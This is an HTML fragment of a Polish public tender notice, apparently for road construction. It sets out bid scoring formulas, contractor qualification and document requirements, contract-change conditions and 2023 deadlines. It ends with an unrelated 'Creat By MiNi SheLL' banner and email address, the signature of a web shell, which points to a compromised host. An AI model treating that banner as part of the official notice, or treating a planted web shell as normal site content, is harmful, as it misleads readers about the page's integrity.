class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt. 7 i 8<br/>ustawy Prawo zamówień publicznych, polegających na powtórzeniu podobnych robót<br/>budowlanych, zgodnych z przedmiotem zamówienia podstawowego. Przedmiot zamówienia:<br/>podobne roboty budowlane zgodne z przedmiotem zamówienia podstawowego o kodach CPV<br/>określonych w tym zamówieniu. Wielkość lub zakres zamówienia: do 20% wartości zamówienia<br/>podstawowego. Warunki na jakich zostanie udzielone zamówienie: zgodnie z warunkami<br/>dotyczącymi zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej zamawiający będzie kierował się następującymi kryteriami, z<br/>przypisaniem im odpowiednio wag:<br/>1) cena oferty – 60%<br/>2) okres gwarancji – 40%<br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) Punkty w kryterium cena brutto oferty w PLN wyliczone będą z dokładnością do dwóch miejsc po przecinku (zasada zaokrąglania<br/>trzeciego miejsca po przecinku – poniżej 5 końcówkę pomija się, powyżej i równe 5 zaokrągla się w górę) wg poniższego wzoru:<br/>C= (Cmin/Cx) x 60 pkt.<br/>gdzie:<br/>C – przyznane punkty w kryterium ceny oferty brutto w PLN;<br/>Cmin - najniższa cena oferty brutto w PLN spośród ofert niepodlegających odrzuceniu;<br/>Cx – cena brutto w PLN badanej oferty.<br/>2) Punkty w kryterium okres gwarancji, zostaną przyznane wg następujących zasad:<br/>Okres gwarancji – maksymalnie 40 pkt. (nie mniej niż 36 miesięcy, nie więcej niż 84 miesiące)<br/>Przyjmuje się, że oferta z najdłuższym okresie gwarancji otrzyma 40 pkt.<br/>W przypadku gdy Wykonawca poda dłuższy okres gwarancji do obliczeń Zamawiający przyjmie wartość 84 miesiące. W przypadku,<br/>gdy Wykonawca złoży ofertę, w której wskaże okres gwarancji poniżej 36 miesięcy oferta będzie potraktowana jako niezgodna z<br/>treścią SWZ i zostanie odrzucona, w przypadku gdy Wykonawca nie wpisze nic w tym kryterium oceny, Zamawiający przyjmie do<br/>obliczeń wartość minimalną gwarancji, tj. 36 miesięcy.X =(ilość pełnych miesięcy okresu gwarancji ocenianej oferty - 36) / (84 - 36)x 40 pkt.<br/>3. Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów łącznie ze wszystkich kryteriów. Ocenę<br/>łączną oferty stanowi suma punktów uzyskanych w ramach poszczególnych kryteriów. Zamawiający wyliczy ocenę łączą ocenianych<br/>ofert na podstawie poniższego wzoru:<br/>E = C + X<br/>gdzie:<br/>E – łączna liczba punktów otrzymana przez ofertę we wszystkich kryteriach oceny,<br/>C – liczba punktów w kryterium ceny oferty brutto w PLN,<br/>X – liczba punktów w kryterium okres gwarancji,<br/>4. Zamawiający będzie zaokrąglał punkty do dwóch miejsc po przecinku w każdym wskaźniku. Zasada zaokrąglenia dotyczy<br/>trzeciego miejsca po przecinku – poniżej 5 końcówkę pominie, powyżej i równe 5 zaokrągli w górę.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej<br/>cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu o<br/>zamówieniu i niniejszej SWZ.<br/>2. Zamawiający wymaga wykazania przez Wykonawcę spełniania warunków udziału w<br/>postępowaniu dotyczące zdolności do należytego wykonania zamówienia w zakresie sytuacji<br/>ekonomicznej lub finansowej:<br/>Zamawiający uzna, że Wykonawca znajduje się w sytuacji ekonomicznej lub finansowej<br/>niezbędnej do realizacji zamówienia, jeżeli Wykonawca wykaże, że posiada środki finansowe lub<br/>zdolność kredytową w wysokości nie niższej niż 500.000,00 zł (słownie: pięćset tysięcy złotych<br/>00/100)<br/>UWAGA 1!<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy<br/>warunek musi spełniać w całości co najmniej jeden z tych Wykonawców.<br/>W przypadku polegania przez Wykonawcę na zdolnościach podmiotu udostępniającego zasoby, w<br/>myśl art. 118 ustawy Pzp, powyższy warunek musi spełniać w całości podmiot udostępniający<br/>zasoby.<br/>UWAGA 2!<br/>Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż<br/>wskazane przez Zamawiającego należy przeliczyć wg średniego kursu złotego w stosunku do<br/>walut obcych określonego w Tabeli Kursów A średnich walut obcych Narodowego Banku<br/>Polskiego (NBP) na dzień wystawienia dokumentu.<br/>3. Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków określonych w art.<br/>112 ust. 2 ustawy pzp dotyczących zdolności technicznej i zawodowej:<br/>1) Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi wykaz robót<br/>budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat od dnia w którym upływa<br/>termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie<br/>minimum jedną robotę budowlaną o wartości min. 500.000,00 zł brutto (słownie: pięćset tysięcy<br/>złotych), która w swoim zakresie miała budowę lub przebudowę drogi (należy przez to rozumieć<br/>budowę lub przebudowę w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z<br/>2023 r., poz. 682, z późn. zm.).<br/>4. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych lub sytuacji<br/>finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków prawnych.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>6. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu (wzór - załącznik nr 4 SWZ) udostępniającego<br/>zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca, realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu<br/>udostępniającego zasoby ma potwierdzać, że stosunek łączący Wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty należy dołączyć<br/>oświadczenie o niepodleganiu wykluczeniu w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym, a następnie wraz z plikami stanowiącymi ofertę skompresować do jednego pliku archiwum (ZIP)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>następujących podmiotowych środków dowodowych potwierdzających spełnianie warunków<br/>udziału w postępowaniu:<br/>1) wykaz robót wykonanych nie wcześniej niż w okresie ostatnich 5 lat od dnia w którym upływa<br/>termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie<br/>minimum jedną robotę budowlaną o wartości min. 500 000,00 zł brutto (słownie: pięćset tysięcy<br/>złotych), która w swoim zakresie miała budowę lub przebudowę drogi (należy przez to rozumieć<br/>budowę lub przebudowę w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U.<br/>z 2023 r. poz. 682 t.j., z późn. zm.) - z załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały<br/>wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o<br/>obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne<br/>dokumenty (wzór wykazu - załącznik nr 5 do SWZ);<br/>2) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie<br/>wcześniejszym niż 3 miesiące przed jej złożeniem<br/>2. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać<br/>Zamawiającemu przy użyciu środków komunikacji elektronicznej dopuszczonych w SWZ, w<br/>zakresie i sposób określony w przepisach rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z<br/>tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W trakcie realizacji zamówienia na każde wezwanie zamawiającego w wyznaczonym w tym wezwaniu terminie<br/>wykonawca przedłoży zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących wskazane w punkcie 4 czynności w<br/>trakcie realizacji zamówienia:<br/>• oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności,<br/>których dotyczy wezwanie zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie<br/>podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują<br/>osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, imion i nazwisk tych osób, rodzaju<br/>umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub<br/>podwykonawcy;<br/>• poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię umowy/umów o pracę<br/>osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie wykonawcy lub<br/>podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów<br/>powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami<br/>ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. z 2018 r., poz. 1000) (tj. w szczególności bez adresów,<br/>nr PESEL pracowników). Imię i nazwisko pracownika nie podlega anonimizacji. Informacje takie jak: data zawarcia umowy,<br/>rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania;<br/>• zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub podwykonawcę składek na<br/>ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy;<br/>• poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu<br/>potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający<br/>ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych<br/>osobowych (Dz. U. z 2018 r., poz. 1000). Imię i nazwisko pracownika nie podlega anonimizacji.<br/>2. Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu w postaci elektronicznej opatrzone kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, a następnie wraz z plikami stanowiącymi ofertę<br/>skompresować do jednego pliku archiwum (ZIP).<br/>3. Do przygotowania oferty zaleca się wykorzystanie Formularza Oferty, którego wzór stanowi Załącznik nr 1 do SWZ. W<br/>przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić<br/>wszystkie informacje wymagane w Formularzu Ofertowym.<br/>4. Do oferty należy dołączyć pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia do oferty należy załączyć<br/>pełnomocnictwo dla pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Wykonawca dołącza do oferty oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy, którego wzór stanowią załączniki<br/>nr 2 i 3 do SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w<br/>postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa<br/>powyżej - załączniki nr 2 i 3 do SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>3.Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub<br/>usługi wykonają poszczególni Wykonawcy.<br/>5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa powyżej –<br/>załącznik nr 10 do SWZ, składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy w zakresie ceny - zmiana: • stawki podatku od towarów i usług oraz podatku akcyzowego<br/>2. Zmiana umowy w zakresie zmiany terminu realizacji:<br/>a) wydanie decyzji administracyjnej przez organ nadzoru budowlanego lub ochrony środowiska o wstrzymaniu robót;<br/>b) wstrzymanie robót przez Zamawiającego lub przez uprawnione organy;<br/>c) wystąpienie nieprzewidzianych zjawisk atmosferycznych;<br/>d) wystąpienia siły wyższej, rozumianej jako zdarzenie niemożliwe do przewidzenia, na które Strony nie mają wpływu i są<br/>przez Strony niemożliwe do pokonania, a w szczególności: klęski żywiołowe, wojny, zamknięcie granic uniemożliwiające<br/>wykonanie umowy w całości lub w części, pod warunkiem dostarczenia w terminie 5 dni od dnia zaistnienia siły wyższej,<br/>przez Stronę dotkniętą wystąpienie siły wyższej, dokumentu potwierdzającego zaistnienie siły wyższej wystawionego przez<br/>właściwy organ administracji publicznej oraz wskazania wpływu zdarzenia na wykonanie umowy, i jeśli wystąpienie siły<br/>wyższej wpłynął bezpośrednio na prawidłowe wykonywanie robót i termin ich wykonania to termin wykonania umowy<br/>zostanie przedłużony o czas jej trwania;<br/>e) w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez<br/>czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, szczególnie zagrażające bezpośrednio życiu lub<br/>zdrowiu ludzi lub grożące powstaniem szkody niewspółmiernie większej niż spowodowana działaniem lub zaniechaniem;<br/>f) wystąpienie warunków gruntowo – wodnych uniemożliwiających wykonanie (prowadzenie)robót budowlanych zgodnie ze<br/>sztuką budowlaną, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów;<br/>g) zmiana spowodowana nieprzewidzianymi w specyfikacji warunkami geologicznymi, archeologicznymi lub terenowymi, w<br/>szczególności istnieniem niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych lub niewypałów<br/>lub niewybuchów lub wykopalisk archeologicznych, itp.;<br/>h) konieczność usunięcia błędów lub wad w dokumentacji projektowej albo konieczność wprowadzenia zmian w<br/>dokumentacji projektowej lub specyfikacjach technicznych wykonania i odbioru robót, które maja wpływ na termin wykonania<br/>przedmiotu umowy;<br/>i) konieczność zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, przy zastosowaniu odmiennych<br/>rozwiązań technicznych lub technologicznych, niż wskazane w dokumentacji projektowej, a wynikających ze stwierdzonych<br/>wad tej dokumentacji lub zmiany stanu prawnego w oparciu o które je przygotowano, gdyby zastosowanie przewidzianych<br/>rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu umowy;<br/>j) konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu Umowy, które<br/>wstrzymują lub opóźniają realizację przedmiotu Umowy;<br/>k) wystąpienie niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w<br/>zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji;<br/>l) wystąpienia na terenie kraju pandemii lub epidemii powodującej konieczność wstrzymania kluczowych robót z uwagi na<br/>brak materiałów lub nieobecność pracowników z zastrzeżeniem §9 niniejszej umowy;<br/>m) przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki ochrony prawnej<br/>wykorzystywane przez wykonawców lub inne podmioty, lub Zamawiającego przed zawarciem umowy; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-19 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/leba</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-19 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com